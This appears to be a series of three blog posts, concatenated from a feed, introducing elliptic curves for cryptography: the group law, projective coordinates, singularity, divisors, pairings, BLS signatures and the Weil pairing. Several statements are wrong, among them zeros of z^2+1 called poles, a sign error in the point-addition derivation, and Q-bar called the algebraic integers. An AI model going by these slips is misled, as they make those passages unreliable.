Prerequisites: Fundamental Concepts Underlying Elliptic Curves (Level 1): Projective Space)
In complex analysis, we study functions that are differentiable (in the complex sense) at almost all points. The study of the zeros (\(f(z)=0\)) and poles (\((1/f)(z)=0\)) is very important, because in complex analysis, the famous Cauchy’s integral theorem implies if \(f\) is holomorphic (does not have any poles), then for \(C\) enclosing a simply connected domain,\[\oint_Cf(z)d\,z=0,\] on the other hand, the residue theorem implies that the integral of \(f\) (that has poles) relates to the poles and its order.
For polynomials, we know that \(f(x)=x\) and \(g(x)=x^2\) both have a zero at \(x=0\), but for \(g(x)\), the root is a “repeated root”. We say that for \(f(x)\), the order of zero (at \(x=0\)) is \(1\) while that of \(g(x)\) is \(2\).
On the other hand, \(h(x)=1/x\) and \(u(x)=1/x^2\) both have a pole at \(x=0\), but the order of pole of \(h\) is \(1\) while that of \(u\) is \(2\)^{1}.
In general, for a function \(f(z)\), the order of zero of a point \(z_0\) is \(m\), if \(f\) is analytic at \(z_0\), \(f^{(n)}(z_0)=0\) for \(n=0,1,\cdots,m-1\), and \(f^{(m)}(z_0)\neq 0\). The order of pole of a point \(z_0\) is \(m\), if for the function \(1/f\), the order of zero of \(z_0\) is \(m\).
For rational functions (where it can be written as a fraction, both numerator and denominator are polynomials), the order of zero of the whole function is the order of zeros of the numerator minus the order of zeros of the denominator. We say the order of zero of the zero polynomial is infinity.
We can denote the order of zero of a holomorphic (complex-differentiable) function \(f\) at the point \(p\) by \(ord_p(f)\). Then to extend the definition to meromorphic functions, if \(f=g/h\) where \(g\) and \(h\) are holomorphic , then \(\ord_p(f)=\ord_p(g)-\ord_p(h).\)
The order satisfies the following properties:
The zeros and poles of a meromorphic functions can be captured in a simple object.
Let \(\Div(\mathbb{C}^*)\) be the free abelian group generated by the points of \(\mathbb{C}^*\)^{2}. Elements of \(Div(\mathbb{C}^*)\) have the form \(\displaystyle\sum_{P\in\mathbb{C}^*} n_p (P)\), where the sum is finite.
These elements are called divisors. The group itself is called the divisor group of \(\mathbb{C}^*\).
If \(D\in \Div(\mathbb{C}^*)\), we can define the degree of a divisor as \(\displaystyle\deg D = \sum_{P\in\mathbb{C}^*} n_p\).
For a meromophic function \(f(z)\), we can define the divisor of \(f\) as \[\div f=\sum_{P\in\mathbb{C}^*} \left(\ord_Pf\right)(P).\] Since \(f\) is meromorphic, the points \(P\) at which \(\ord_P f\neq 0\) is finite, so \(\div f\) is indeed a divisor. In fact, if \(f\in K(\mathbb{C}^*)^*\) (non-zero meromorphic function), then \(\deg\div f=0\).
Let \(K(\mathbb{C}^*)\) be the field of meromorphic functions on \(\mathbb{C}^*\). Then the divisor function \(\div\cdot: K(\mathbb{C}^*)^*\to \Div(\mathbb{C}^*)\) is a homomorphism of groups. Divisors of the form \(\div f\) is known as principal divisors.
We say two divisors are linearly equivalent, denoted \(D\sim D'\), if \(D-D' = \div f\) for some meromorphic \(f\). This give rise to the quotient group of \(\Div(\mathbb{C}^*)\) by the principal divisors, as the Picard group (or the divisor class group) of \(\mathbb{C}^*\), denoted as \(\Pic(\mathbb{C}^*)\) or \(\Cl(\mathbb{C}^*)\).
Let’s work through an example of computing the divisor of the function \(f(z) = z^2 + 1\). Obviously we have a pole of order \(1\) at \(z=i\) and \(-i\). However, since we are considering the domain of \(\mathbb{C}^*\), we also need to consider the point at infinity. In this case we say we have a pole at infinity if \(f(\frac 1z)\) has a zero at \(z=0\), and a pole at infinity if \(f(\frac 1z)\) has a pole at \(z=0\).
Here we have \(f(\frac 1z) = \frac{1}{z^2}+1\), which has a pole of order \(2\) at \(z=0\). So in the divisor of \(f\) is \[\div f = (i)+(-i)-2(\infty)\]
Of course, since \(f\) is meromorphic, we already know that \(\deg \div f = 0\), so after computing the zeros and poles of points in \(\mathbb{C}\), we can already conclude that \(\ord_\infty f = -2\).
Now we turn our attention back to elliptic curves. The theory of divisors are almost the same as the case of \(\mathbb{C}^*\) (with the details omitted for now), except in the case of the Riemann shpere, we are considering meromorphic functions. In the case of elliptic curves, the function we consider rational functions, which we shall discuss next time, but for now, just think of them as “locally” a ratio of polynomials.
Using the definition as above, and let \(E\) be an elliptic curve,
Theorem : For each degree-0 divisor \(D\in \Div(E)\), there exists a point \(P\in E\) such that \(D\sim(P)-(\mathcal{O})\).
This gives an isomorphism of groups between \(E\), and the degree-0 part of the Picard group \(\Pic^0(E)\) (where the group operation is taken from \(\Div(E)\)).
Corollary : Let \(E\) be an elliptic curve and \(\displaystyle D=\sum_{P\in E}n_P(P)\in\Div(E)\) be a divisor. Then \(D\) is a principal divisor if and only if\[\sum_{P\in E}n_P=0\qquad\text{and}\qquad\sum_{P\in E} [n_P]P = \mathcal{O} \]
Where the second summation is using the group law of elliptic curves.
To see how divisors relate to cryptography, we first turn our attention back to cryptoghraphy.
Let \(G_1,G_2,G_T\) be three cyclic groups all of order \(q\), where \(q\) is a prime number. By convention we write the first two group additively, and the third multiplicatively. Then a pairing is a map \(e:G_1\times G_2\to G_T\) such that
Example (Determinant): For every free \(R\)-module \(M\), the determinant map \(\det: M\times M\) is a non-degenrate bilinear map.
Let \(R=\mathbb{Z}/m\mathbb{Z}\) where \(m\) is an integer larger than 1, and consider the free \(R-\)Module \(R\times R\), the determinant is a pairing. Choosing a basis \(\{u, v\}\), we have \[\det(au+bv, cu+dv)=ad-bc \] where we note that the value is independent of the choice of basis.
We also note that the definition of pairing implies for every \(P\in G_1, Q\in G_2\) and \(a,b\in \mathbb{Z}\), we have \(e(aP,bQ)={e(P,Q)}^{ab}\).
Example : Let \(G_1=G_2=F_5\) (under addition), and \(G_T=\langle 5\rangle =\{1,3,4,5,9\}\in F_{11}^\times\) (under multiplication). Then the map \(e:G_1\times G_2\to G_T\), \(e(x,y)=3^{xy}\pmod{11}\) is a pairing.
Check to see that \(e(u+v, w)=3^{(u+v)w}= 3^{uw}3^{vw}=e(u,w)e(v,w)\). The case for \(G_2\) is the same. To see non-degeneracy, in this case we just need to enumerate all possibilities.
Exercise: Let \(G_1,G_2,G_T\) as above, \(u\in G_1, v\in G_2\) and \(a\in \mathbb{Z}_{>0}\). Show that \(e(au, v) = e(u,av)\).
One application of pairings in cryptography is to create digital signatures. Let \(G, G_T\) be cyclic groups of prime order \(q\), and \(e: G\times G\to G_T\) be a pairing. Additionally we also assume a hash function \(H\) that outputs an element in \(G\). Pick a generator \(g\) for \(G\).
To generate the key, we pick a random integer \(x\) with \(0<x<q\), the private key is \(x\), and the public key is \(g^x\).
To sign a message \(m\), we first compute the hash of it \(H(m)\), then the signature is \(H(m)^x\).
To verify a message \(s\) and the public key \(pk\), we simply verify that \(e(s,g) = e(H(m),pk)\).
The correctness of the signature is due to the fact that \(e(s,g) = e(H(m)^x, g) = e(H(m), g^x) = e(H(m), pk))\).
One nice property of BLS is that the signature is very small: it consists of only a single group element (of roughly the same size as \(q\))!
The security of BLS relies on the fact that (roughly) the discrete logarithm problem of the underlying group \(G\) is hard. More specifically, we assume that the computational Diffie-Hellman (CDH) problem is intractable.
Definition (CDH): Let \(\langle g\rangle\) be a finite cyclic group of prime order \(p\). Let \(a,b\in \mathbb{Z}_p^*\), and given \((g, g^a, g^b)\), the computational Diffie-Hellman problem asks the value of \(g^{ab}\).
Now we try to construct a pairing with elliptic curves. Let \(E\) be an elliptic curve over \(K\), \(m\) an integer larger than 2, which is relatively prime to \(char(K)\).
Proposition-Definition (\(m-\)torsion point): The group of \(m-\)torsion points \(E[m]=\{P\in E: [m]P=\mathcal{O}\}\) are the points \(P\in E\) such that \([m]P=0\). It is the kernel of the function \([m]: E\to E\) defined by \(P\mapsto [m]P\).
We have that \(E[m] \cong \mathbb{Z}/m\mathbb{Z} \times \mathbb{Z}/m\mathbb{Z}\).
Let \(P, Q\in E[m]\), and choose a rational function \(F\) such that the divisor is \[\div F = \sum_{0\leq k<m} (P+[k]Q) - ([k]Q) \]. This is possible because \(\displaystyle \sum_{0\leq k<m} P+[k]Q - [k]Q = [m]P= \mathcal{O}\) (since \(P\) is a \(m-\)torsion point), and by applying the corollary above the divisor is principal.
Let \(G(X) = F(X+Q)\), then the divisor of \(G\) is the same, so \(F(X+Q)/F(X)\) is constant, and is a \(m-\)th root of unity. Then define the Weil pairing as \(e_m(P,Q) = \frac{F(X+Q)}{F(X)}\). This is a mapping from \(E[m]\times E[m]\to \mu_m\), where \(\mu_m\) contains the \(m-\)th roots of unity \(\mu_m=\{x\in K: x^m=1\}\).
Here we use an example of the curve BLS 12-381, which is defined by \(y^2=x^3+4\pmod{q}\) where \(q\) is as defined below. The code snippet below shows a weil pairing with \(m=11\).
Silverman, J. H. (2009). The arithmetic of elliptic curves (Vol. 106, pp. xx+-513). New York: Springer.
]]>Prerequisites: Fundamental Concepts Underlying Elliptic Curves (Level 0): High-level Overview)
The point at infinity raises many questions. For example, why is it represented as \((0:1:0)\) and other points as \((x:y:1)\)?
We say a relation \(R\) over the set \(X\) is a subset of \(X\times X\). If \((a,b)\in R\), we write \(aRb\), or \(a\sim b\). Also say \(\sim\) is the relation.
Using the notion of relation, we can define an equivalence relation on X as a relation \(\sim\) such that
The trivial relation \(S\times S\) (so \(a\sim b\) for every \(a,b\in S\)) and the diagonal relation \(\Delta=\{(a,a):a\in S\}\) (so we only have \(a\sim a\) for all \(a\in S\) and nothing else) are equivalence relations on \(S\).
On the other hand, the empty relation \(\emptyset\) is a relation, but not an equivalence relation. To see why, note that reflexivity requires \((a,a)\in R\) for all \(a\in X\), but empty relation is, obviously, empty.
This also disproves the misconception some students have when learning the subject: if we have symmetry and transivity, symmetry gives \(a\sim b\) and \(b\sim a\), then transitivity gives \(a\sim a\), so reflexivity is not needed, right? The empty relation is a counter-example to this.
Define a relation \(\sim\) on \(Q=\mathbb{Z}\times(\mathbb{Z}-\{0\})\) as saying \((a,b)\sim (c,d)\) if \(ad=bc\). This in fact defines the equivalence of fractions by viewing \((a,b)\) as \(a/b\).
So \((x_1,y_1)\sim(x_3,y_3)\).
Exercise
For any \(a,b\in\mathbb{Z}\), say \(a\equiv b\) (mod n) if \(a-b\) is divisible by n, or \(\exists k\in\mathbb{Z}\) such that \(a-b=nk\). Verify that this is an equivalence relation.
Let \(\equiv\) be an equivalence relation defined on the set X. Take \(a\in X\), denote the equivalence class of a: \([a]=\{k\in X: a\equiv k\}\) to be the set of elements equivalent to \(a\). Then \(\forall a,b\in X\), either\[ [a]=[b]\text{ or } [a]\cap[b]=\emptyset. \] This essentially show that the equivalence relation partitions a set X.
Take \(a,b\in X\) and let \(\equiv\) to be the equivalence relation.
If there are any elements, say \(c\), such that \(c\) is both in \([a]\) and \([b]\), then we have that\[
a\equiv c\text{ and } b\equiv c.\]
By symmetry of equivalence relations, we get \(c \equiv b\). Then by transitivity, we get \(a\equiv b\). Now consider any elements \(k\in [b]\). We get \(b\equiv k\), so by the same argument, we get \(a\equiv k\), so \([b]\subseteq[a]\).
Similarly, every element in \([a]\) is equivalent to b, so \([a]\subseteq[b]\).
In this case we have \[[a]=[b].\]
If there are no common elements in \([a]\) and \([b]\), then by definition \([a]\cap[b]=\emptyset\).
Given a set \(X\) and an equivalence relation \(\sim\) on \(X\), we can define the quotient set \(X/\sim\) to be the set of equivalence classes \(\{[a]: a\in X\}\).
As an example, take the mod equivalence relation on \(\mathbb{Z}\), i.e. for any \(a,b\in\mathbb{Z}\), say \(a\equiv b\) (mod n) if \(a-b\) is divisible by n. This partitions the integers into \(n\) equivalence classes. The equivalence classes are the \(n\) different remainders of integers when dividing by \(n\). This gives us the quotient set \(\mathbb{Z}/n\mathbb{Z}=\{[x]:x\in\mathbb{Z}\}\) which we can take the representative \([x]\) for \(x=0,1,\cdots,n-1\), so we can view \(\mathbb{Z}/n\mathbb{Z}=\{0,1,\cdots,n-1\}\).
Given a function \(f\) on the set \(X\) and a equavalence relation \(\sim\) on \(X\), we can construct a “function” \(\tilde{f}\) on the quotient set \(X/\sim\) by setting \(\tilde{f}([x])=f(x)\). This is problematic, however, because if we pick two elements \(a,b\) from the same equivalence class \([x]\), then since \([a]=[b]\), the definition gives \(\tilde{f}([a])=\tilde{f}([b])\), which means that we will need \(f(a)=f(b)\).
The property that every representative of the same equivalence class should map to the same value is not trivial. This property is called well-definedness. A function is well-defined on the quotient when the value of the function is independent of the choice of representative.
It turns out that in general, functions defined this way are not well-defined. However when we deal with sets with additional structures such as groups and rings, this construction of \(\tilde{f}\) on certain equivalence relations will give a well-defined function. For example, the multiplication of integers mod \(n\), constructed using the ordinary integer multiplication, is well-defined.
Let us look at an example of non well-defined function^{1}.
We define a function on non-zero fractions: write the fraction as \(\frac{a}{b}\), and set \(f(\frac{a}{b})=b\). This function is not well defined, because for example \(f(\frac{1}{2})=2\), but \(f(\frac{2}{4})=4\), and \(\frac{1}{2}=\frac{2}{4}\). When we fix this by changing the definition to: \(g(\frac{a}{b})=b/\gcd(a,b)\), this will be well-defined, because dividing by the gcd gives us the reduced form of fractions, which is unique.
Now we are ready to talk about the projective space. Instead of considering the points in the space \(K^n\) (where \(K\) is a field), we can consider the lines in \(K^n\), with the condition that it must pass through the center.
For example, let’s consider the real euclidean plane \(\mathbb{R}^2\). The lines that pass through the center will all have the form \(y=kx\), where \(k\in\mathbb{R}\) is the slope, or it may also be \(x = 0\) for the vertical line. We can also just use a point \(P=(x,y)\) to represent a line by constructing the unique line passing through \(P\) and the origin.
In this case, if we have two points \(P\) and \(Q\), with \(P,Q\) and the origin being colinear, then \(P\) and \(Q\) will define the same line, so we can consider them to be equivalent. If \(P=(x,y)\) and \(Q=(x',y')\), then \(P\) and \(Q\) define the same line if and only if there exists a non-zero integer \(\lambda\) such that \(y=\lambda x\) and \(y'=\lambda x'\). Of course \((0,0)\) can not define a line in this way.
Using this construction, we just made the real projective line \(\mathbb{P}^1(\mathbb{R})\). We can generalize this construction by using the point construction.
Given a field \(K\), define the Projective \(n\)-space to be the set \(\mathbb{P}^n(K)=\{(x_0,\cdots,x_n)\in K^{n+1}-\{0\}: x_i\in K\}/\sim\), where we declare \((x_0,\cdots,x_n)\sim(y_0,\cdots,y_n)\) if there exists \(\lambda\in K-\{0\}\) such that \((x_0,\cdots,x_n)=(\lambda y_0,\cdots,\lambda y_n)\).
We can denote the set of equivalence class as \([x_0:\cdots:x_n]\) or \([x_0,\cdots,x_n]\), and they are called the homogeneous coordinates.
Take \([a,b]\in \mathbb{P}^1(\mathbb{R})\).
If \(b\neq 0\), we have \([a,b]=[a/b,1]\), and we can actually rewrite as \([x,1]\), where \(x\in\mathbb{R}\).
If \(b=0\), then \(a\neq 0\) so we can rewrite \([a,0]=[1,0]\).
In summary, we have \(\mathbb{P}^1(\mathbb{R})=\{[x,1]: x\in\mathbb{R}\}\sqcup\{[1,0]\}\).
We can describe \(\mathbb{P}^1(\mathbb{R})\) as the set of all lines that pass through the origin. Note that \([a,b]=[\lambda a, \lambda b]\) exactly means that \((a,b)\) and \((\lambda a, \lambda b)\) lies on the same line (that passes through the center). Then \([a,1]\) gives the line \(x=ay\) and \([1,0]\) gives the horizontal line \(y=0\).
Another interpretation is that since \(\{[x,1]: x\in\mathbb{R}\}\) is really just \(\mathbb{R}\) (since the second coordinate does nothing), we can regard \(\mathbb{P}^1(\mathbb{R})\) as \(\mathbb{R}\), but with an extra point \([0,1]\) we shall call the point at infinity. Some may denote this as \(\mathbb{R}\cup\{\mathcal{O}\}\), where we use \(\mathcal{O}\) to denote the point at infinity.
Taking the line interpretation, for each line that passes through the center we can pick a point on the upper part of the unit circle (since such a line will pass through the unit circle at 2 points, so we pick the upper part). The points \((-1,0)\) and \((1,0)\) represent the same line, so we can join them together (identify them as the same point), and we see that in fact \(\mathbb{P}^1(\mathbb{R})\) is really the same as the unit circle. Since circle is compact, \(\mathbb{P}^1(\mathbb{R})\) (with the quotient topology of \(\mathbb{R}^2\)) is also compact.
How about \(\mathbb{P}^2(K)\)? It consists of the points \([x,y,z]\). If \(z \neq 0\), then we can just divide the whole thing by \(z\) to get \([x/z,y/z,1]\), and we can map these points \([a,b,1] \mapsto (a,b)\in K^2\). If \(z=0\), then since we cannot divide by zero, we consider the points \([x,y,0]\) the points at infinity.
In fact, if \(y\neq 0\) we can divide by \(y\) to get \([a,1,0]\), and further \(x=0\) we get \([0,1,0]\). So when \(z=0\), the remaining coordinates resemble \(\mathbb{P}^1(K)\)! So In summary we have the following disjoint union: \[ \mathbb{P}^2(K)=K^2\sqcup\mathbb{P}^1\]
We can also make a general statement of \(\mathbb{P}^n(K) = K^n\sqcup\mathbb{P}^{n-1}(K)\) with the same argument.
We also have one space, the usual \(K^n\), which we will call it the affine \(n-\)space \(\mathbb{A}^n(K)=\{(x_1,\cdots,x_n):x_i\in K\}\).
For an affine space \(\mathbb{A}^n(K)\), we can define a polynomial \(f(x_1,\cdots,x_n)\) as the set the formal sum of the form \(\displaystyle\sum_{d=1}^N\sum_{i_1+\cdots+i_n = d} a_{i_1i_2\cdots i_n} x_1^{i_1}\cdots x_n^{i_n}\), where \(a_{i_1\cdots i_n}\in K\). The degree of a polynomial is the highest sum of the exponents of the variables with non-zero coefficients. For example, \(f(x,y)=xy^3 + x^2 + xy + y + 1\) has degree 4.
There is a polynomial evaluation function \(\phi_f:\mathbb{A}^n(K)\to K\) by mapping \((a_1,\cdots,a_n)\mapsto f(a_1,\cdots,a_n)\). Then we can talk about the the set of points \(V(f)=\{P\in\mathbb{A}^n(K): f(P)=0\}\), aka the roots. This can give us an example of an affine variety, but we shall discuss this next time.
Can this be mimicked to the projective space? Given \(f(x_0,\cdots,x_n)\), we may, carelessly, consider the root of \(f(P)=0,\), where \(P\in\mathbb{P}^n(K)\). This is problematic, however, because \(\lambda P \sim P\) for any non-zero \(\lambda\in K\), but \(f(P)=0\) in general does not mean \(f(\lambda P)=0\).
We say the function \(\phi_f: \mathbb{P}^n(K)\to K\) by \(\phi_f(P)=f(P)\) is not well-defined, because the value will depend on the choice of the representative \(P\) in the equivalence class.
This is why we can only consider polynomials in which the above holds.
Definition:
We say a polynomial \(f(x_1,\cdots,x_n)\) is homogeneous of degree d if all the terms \(a_{i_1i_2\cdots i_n} x_1^{i_1}\cdots x_n^{i_n}\) has the property that \(a_{i_1i_2\cdots i_n}\in K\) and \(i_1+\cdots+i_n=d\).
Equivalently, for all \(\lambda\in K\), \(f(\lambda x_1,\cdots,\lambda x_n)=\lambda^d f(x_1,\cdots,x_n)\).
Exercise
Proof that the two conditions are indeed equivalent.
For a homogeneous polynomial \(f\), and \(P\in\mathbb{P}^n(K)\), we really have \(f(P)=0\) implying \(f(\lambda P)=0\) for all \(\lambda\in K\). So we can make sense of the roots of homogeneous polynomials in projective space. We can also have the notation \(V(f)=\{P\in\mathbb{P}^n(K): f(P)=0\}\) where \(f\) is a homogeneous polynomial. This is a projective variety, and we will also delay the discussion of this.
For any polynomial \(f(x_1,\cdots,x_n)\), we can convert it to a homogeneous polynomial \(F(x_0, x_1,\cdots,x_n)\) of degree \(d\) (\(d\) equal to the largest degree of terms in \(f\)) by doing \(F(x_0,\cdots,x_n)=x_0^d f(\frac{x_1}{x_0}\cdots,\frac{x_n}{x_0})\), or you may just think of the operation as multiplying each term by an appropiate power of \(x_0\), so that in the end result, every term has degree \(d\). This is called the homogenization of the polynomial.
We can convert \(F(x_0, x_1,\cdots,x_n)\) to \(f(x_1,\cdots,x_n)\) easily by \[ f(x_1,\cdots,x_n)=F(\mathbf{1},x_1,\cdots,x_n).\]
For \(f(x,y) = y^2 - x^3 + 1\), the homogenization of \(f(x,y)\) will be \(F(x,y,z) = y^2z - x^3 + z^3\) (\(z\) is moved to the third coordinate for simplicity). Then \(F(x,y,1) = y^2-x^3+z^3 = f(x,y)\).
Exercise
Show that any homogeneous polynomial \(F(x_1,\cdots,x_n)\) of degree \(d\) satisfies the following:\[ d\cdot F=\sum\limits_{i=1}^n x_i \frac{\partial F}{\partial x_i}\]
For elliptic curves in (short) Weierstrass form \(f(x,y) = y^2 -( x^3 + Ax + B)\), the homogenization is \(F(x,y,z)=y^2z -( x^3 + Axz^2 + Bz^3)\). Now for any \((x,y)\in \mathbb{A}^2(K)\), we have an inclusion \(i: \mathbb{A}^2(K)\hookrightarrow \mathbb{P}^2(K)\) by \((x,y)\mapsto [x,y,1]\). So for those points, \(F(i(x,y)) = f(x,y)\).
If \(z=0\), then \(F(x,y,0) = -x^3\). Since \(F(0,y,0) = 0\) for any \(y\neq 0\) ( \(y=0\) is not allowed), there is only 1 point of infinity (out of the others in the form \([x,y,0]\)) that is also on the elliptic curve, namely \([0,1,0]\).
This suggests that we should define elliptic curves using projective space as: given the polynomial \(f(x,y) = y^2 - (x^3 + Ax+B)\) in short Weierstrass form, the elliptic curve is the set of points that satisfy \(F(x,y,z)=0\), i.e. \[ E(K) = \{ P\in \mathbb{P}^2(K): F(P)=0 \} \]
This will consist of \(\{[x,y,1]: f(x,y)=F(x,y,1)=0\}\subset \mathbb{P}^2(K)\), and the point at infinity \([0,1,0]\). \([x,y,1]\) can be mapped back to \((x,y)\in \mathbb{A}^2(K)\), and \([0,1,0]\) is a special point we call the point at infinity \(\mathcal{O}\).
In sage, we can use the projective coordinates to represent a point on an elliptic curve.
With the projective space description above, we can finally define a “differentiable” elliptic curve.
We say a curve \(C\) (defined by a single equation \(f(x_1,\cdots,x_n)=0\)) is singular at a point \(P\in C\) if \(\frac{\partial f}{\partial x_i}(P)=0\) for all \(i\in\{1,\cdots,n\}\). Otherwise the curve is non-singular at \(P\).
If the curve is non-singular at all points, it is called a non-singular curve. If the curve is singular at some points, it is called a singular curve.
Remark:
Note that the partial derivatives of polynomials can always be defined as \(\frac{dx^n}{dx}= nx^{n-1}\). However, if the characteristic of the field is \(n\), then \(\frac{dx^n}{dx}=0\). In any case, for polynomial \(f\), we always have that \(\frac{\partial f}{\partial x_i}\) is a polynomial, so everything is good.
Now we can prove the following result: An elliptic curve defined by the short Weierstrass equation \(y^2=x^3+Ax+B\) non-singular at all points if and only iff the discriminant is non-zero.
First we will show that the point at infinity is never singular: The homogeneous equation of \(C\) is \(F(x,y,z)=y^2z-x^3-Axz^2-Bz^3=0\). We have that \(\frac{\partial F}{\partial z}=y^2-2zAx-3z^2B\), so \(\frac{\partial F}{\partial z}(0,1,0)=1\) which is not zero.
Now say \(P\in E\) is not the point at infinity. Then the curve is singular iff \(\frac{\partial f}{\partial x}(P)=\frac{\partial f}{\partial y}(P)=0\) for some point \(P\).
Let \((x_0,y_0)\) be a singular point. then taking partial derivatives leave us with \(2y_0 = 3x_0^2+A=0\), which gives \(y_0=0\) and \(A=-3x_0^2\). Substituting it back to the original curve we have \(0 = y_0^2 = x_0^3 + (-3x_0^2)x_0 + B\), so \(B=2x_0^3\). The discriminant gives \[ \Delta = 4(-3x_0^2)^3+27(2x_0^3)^2=27\cdot 4(x_0^6-x_0^6)=0. \]
If \(\Delta=0\), then the equation \(x^3+Ax+B\) has a double root \(x_0\). This happens when the derivative at \(x_0\) is zero. Now the derivative of \(x^3+Ax+B\) at \(x_0\) is \(3x_0^2+A\), which is the same as \(-\frac{\partial f}{\partial x}(x_0,0)\), so \(\frac{\partial f}{\partial x}(x_0,0)=0\).
Then let’s consider \((x_0,0)\), we have \(\frac{\partial f}{\partial y}(x_0,0)=0\), and \((x_0,0)\) is a point in the curve since \(f(x_0,0) = 0^2 - (x_0^3 + Ax_0 + B) = 0\) (since \(x_0\) is a root to the cubic polynomial). This shows that \(\Delta=0\) implies \((x_0,0)\) is a singular point, so \(E\) is singular.
A non well-defined function is actually NOT a function, since you have one input mapping to many outputs, so non well-defined function is a misnomer. To understand the intricacies, readers can refer to the definition of function using relations: we say relation \(R\) of \(X\times Y\) is a function if \(\forall x\in X, y_1,y_2\in Y, (x,y_1)\in R\) and \((x,y_2)\in R\), implies \(y_1=y_2\), so each \(x\) can only map to one value of \(y\). Further, \(\forall x\in X\), there exists some \(y\) such that \((x,y)\in R\) (so every \(x\) is mapped). Then we can use \(y=f(x)\) to denote \((x,y)\in R\). ↩
Prerequisites: The definition of a group
2021-12-16: Added some more example code
To start out, we can first state what is an elliptic curve on a easy-to-understand form: An elliptic curve over a field \(K\), denoted \(E(K)\), is the set of solutions to the equation \[y^2 + a_1xy+a_3y = x^3 + a_2x^2 + a_4x + a_6\] Where \((x,y)\) are both in \(K\), along with a distinguished point at infinity, usually denoted \(\infty\) or \(\mathcal{O}\).
If the characteristic of \(K\) is not 2 or 3 (for example \(\mathbb{R},\mathbb{C}\), \(\mathbb{Z}_p\) with \(p\) prime and larger than 3 (note we shall use \(\mathbb{Z}_p\) to denote the field \(\mathbb{Z}/p\mathbb{Z}\))), then we can simplify the equation using some coordinate transformations to get a much simpler equation of the form\[ y^2=x^3+Ax+B \] This is called the Weierstrass form. For simplicity we shall consider the Weierstrass form in the following posts.
If the coefficients of the elliptic curve is in a field \(L\), then we say that the curve is defined over \(L\). For example, the curve \(y^2=x^3-x+1\) is defined over \(\mathbb{Q}\). We can consider the solution of the elliptic curve where the coordinates are in \(\mathbb{Q}\), but also it’s extensions like \(\bar{\mathbb{Q}}\) (the field of algebraic integers), \(\mathbb{R}\) and \(\mathbb{C}\) (which is the algebraic closure of \(\mathbb{R}\)).^{1}
We can graph elliptic curves defined over \(\mathbb{R}\) in \(\mathbb{R}^2\) and it can look like this:
\(y^2=x^3-x+1,\Delta=-368\)
\(y^2=x^3+x=x(x^2+1),\Delta=-64\)
\(y^2=x^3-x=(x-1)x(x+1),\Delta=64\)
\(y^2=x^3,\Delta=0\)
\(y^2=x^3+x^2=x^2(x+1),\Delta=0\) (Not in Weierstrass Form)
We also define the quantity \(\Delta\), called the discriminant, as \(\Delta=-16(4A^3+27B^2)\). If \(\Delta\) is non-zero, then we call the curve non-singular, and we will just study non-singular elliptic curves in this post.
We note that this discriminant exactly corresponds with the disriminant of the cubic equation \(x^3+Ax+B=0\), and discriminant being 0 means that the cubic equation only has repeated roots, making the curve “non-differentiable” at some point, so we do not worry about these curves. On the other hand, if the discrimint is positive, then the equation has 3 real roots; and if it is negative, then the equation has 1 real root.
We have the definition of elliptic curve, which is great. But how about the “group law” we are used to hearing for elliptic curve? Indeed if we just look at the curve, it is not apparent that a group law can be defined over an elliptic curve.
Take an “differentiable” elliptic curve. Then we can define an “addition” operation of any two points on the curve as follows:
If one of the points is the point at infinity, WLOG assume \(P=\mathcal{O}\), then \(P+Q=O+\mathcal{O}=Q\). Same for \(Q=\mathcal{O}\).
If we take two points \(P\) and \(Q\) on the curve (for \(P\neq Q\)) and both not infinity, we can draw a line with that two points. Then (just take for granted that) the intersection of that line and the elliptic curve will contain another point \(R\) on the curve (besides \(P\) and \(Q\) already). If it really does not exist (for vertical lines), we can still say that the third point of intersection is \(\mathcal{O}\).
For example if you are considering the point \((x,y)\) and \((x,-y)\), then the straight line will not intersect any other points on the curve, so we say \(\mathcal{O}\) is the third point of intersection.
As an example, we consider the curve \[y^2=x^3-x+1\] Let \(P=(0,1)\) and \(Q=(3,5)\). Check to see that \(P\) and \(Q\) are on the curve. Then we can draw a line passing through \(P\) and \(Q\) to find a third point \(R\).
Then, if the coordinate of the third point is \((x,y)\), then \(P+Q\) is defined as the point \((x,\mathbf{-y})\). The geometric meaning is to draw a vertical line on the third point, and the other intersection is what we call \(P+Q\). In this case, we can do the algebra (or just use the explicit formula) to find that the third point of intersection has coordinate \((-\frac{11}{9},-\frac{17}{27})\), so \(P+Q = (-\frac{11}{9},\frac{17}{27})\).
What if \(P=Q\)? Then instead of drawing a line that passing through two points, we just draw the tangent of the curve at \(P\). Then the line will intersect the curve at another point again (actually it still has 3 intersections, just one repeated root). Then the procedure is the same as above.
If we have \(P=(x,y)\), then note that since \((x,y) + (x,-y) = \mathcal{O}\), then the inverse of \(P\) is \((x,-y)\). We can just denote the inverse as \(-P\). Note that this means that if \(P\), \(Q\) and \(R\) are colinear, then \(P+Q+R=\mathcal{O}\).
The operation we defined this way has several properties: For any points \(P,Q,R\in E\) (\(E\) is the elliptic curve),
The first and second property is trivially true from our construction. The third one is true by the geometric intuition. The fourth property, however, is actually very difficult to prove. While you can use the explicit formula for addition to validate it, but it is very cumbersome. We will just take associativity for granted.
Then the operation we defined make \(E\) into a group!
The formula, or actually the algorithm for point addition is as follows: For \(P=(x_1,y_1)\) and \(Q=(x_2,y_2)\) both in the elliptic curve \(E\), if we want to calculate \(P+Q\),
Now let \(x=\lambda^2-x_1-x_2, y=\lambda(x_1-x)-y_1\), we have \(P+Q=(x,y)\).
The only non-obvious part is (4). If \(P\neq Q\), then \(\lambda\) is the slope of the line that passes through \(P\) and \(Q\). If \(P=Q\), then \(\lambda\) is the slope of the tangent of the curve at \(P\), since by implicit differentiation (actually just the formal derivitive)
Now the equation of the line will be \(y = \lambda x + \nu\), where \(\nu = y_1 - \lambda x_1\) is the y-intersect of the line. Now substitute the line equation to the elliptic curve equation to find intersection: \(\begin{align*} (\lambda x + \nu)^2 =& x^3+Ax+B\\ \lambda^2x^2 + 2\lambda\nu x + \nu^2 =& x^3+Ax+B\\ x^3 - \lambda^2 x^2 + (A-2\lambda\nu)x + (B-\nu^2) =& 0 \end{align*}\)
The is a cubic equation, but we do not need to actually solve it, since we already know two of the intersections of the line with the curve, namely \(P\) and \(Q\) by construction! So the above cubic equation have factor \((x-x_1)(x-x_2)\). So we get\[ x^3 - \lambda^2 x^2 + (A-2\lambda\nu)x + (B-\nu^2)=(x-x_1)(x-x_2)(x-x_3) \] Where we use \(x_3\) to denote the unknown intersection. Now compare the \(x^2\) term on both sides: LHS gives \(\lambda^2\), and right hand side gives the negative of sum of \(x_i\)’s, so \(\lambda^2 = - x_1 - x_2 - x_3\). So \(x_3 = \lambda^2 - x_1 - x_2\).
